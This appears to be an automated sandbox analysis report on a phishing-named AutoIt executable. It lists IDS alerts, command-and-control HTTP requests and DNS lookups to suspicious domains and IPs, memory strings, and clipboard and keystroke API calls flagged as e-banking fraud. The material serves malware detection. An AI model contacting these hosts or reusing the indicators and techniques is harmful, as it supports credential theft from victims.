                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:49837
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.7:49844
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
                Source: global trafficHTTP traffic detected: GET /px6j/?9dfhu=10RxttPPB0&6Pvh8TXP=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKLb8lxYxVUxpwQ/Of0rti0wTIxJq6JAsDgXxJoFbzTbGnD1j7Uz133QdH HTTP/1.1Host: www.sunnyz.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9ffw/?6Pvh8TXP=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&9dfhu=10RxttPPB0 HTTP/1.1Host: www.d48dk.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /d3gs/?6Pvh8TXP=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&9dfhu=10RxttPPB0 HTTP/1.1Host: www.8312zcksnu.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4nyz/?6Pvh8TXP=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&9dfhu=10RxttPPB0 HTTP/1.1Host: www.snyp.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                Source: global trafficDNS traffic detected: DNS query: www.sunnyz.store
                Source: global trafficDNS traffic detected: DNS query: www.d48dk.top
                Source: global trafficDNS traffic detected: DNS query: www.8312zcksnu.bond
                Source: global trafficDNS traffic detected: DNS query: www.snyp.shop
                Source: global trafficDNS traffic detected: DNS query: www.duwixushx.xyz
                Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                Source: unknownHTTP traffic detected: POST /yjbljodlunyh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 838
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:32:56 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:32:59 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:33:04 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:33:42 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:33:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:33:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/=
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541665459.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/punqdgkybi
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541665459.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/punqdgkybi-8
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/punqdgkybiS
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/punqdgkybis
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/h
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541530686.0000000000D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/yjbljodlunyh
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541530686.0000000000D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/yjbljodlunyhsT
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
                Source: iavbXasnTxCeiF.exe, 00000011.00000002.2753929696.000000000520D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duwixushx.xyz
                Source: iavbXasnTxCeiF.exe, 00000011.00000002.2753929696.000000000520D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duwixushx.xyz/u11p/
                Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: elevation_service.exe.0.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
                Source: elevation_service.exe.0.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
                Source: choice.exe, 00000010.00000002.2752942454.0000000005138000.00000004.10000000.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003478000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9d
                Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10338gd
                Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: choice.exe, 00000010.00000002.2744008676.0000000002686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: choice.exe, 00000010.00000003.2166044725.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: choice.exe, 00000010.00000002.2752942454.0000000005138000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003478000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shksj.sdnasj.nduau.cn/123.html
                Source: choice.exe, 00000010.00000002.2752942454.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003154000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2285612924.00000000012C4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
                Source: choice.exe, 00000010.00000002.2755534033.0000000007458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: choice.exe, 00000010.00000002.2752942454.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000010.00000002.2754801840.0000000007100000.00000004.00000800.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751956127.0000000003154000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2285612924.00000000012C4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
                Source: RFQ _ Virtue 054451000085.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000000.1487355744.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ce600bb4-6
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000000.1487355744.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_993a2721-e
                Source: RFQ _ Virtue 054451000085.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f4b1d4ef-c
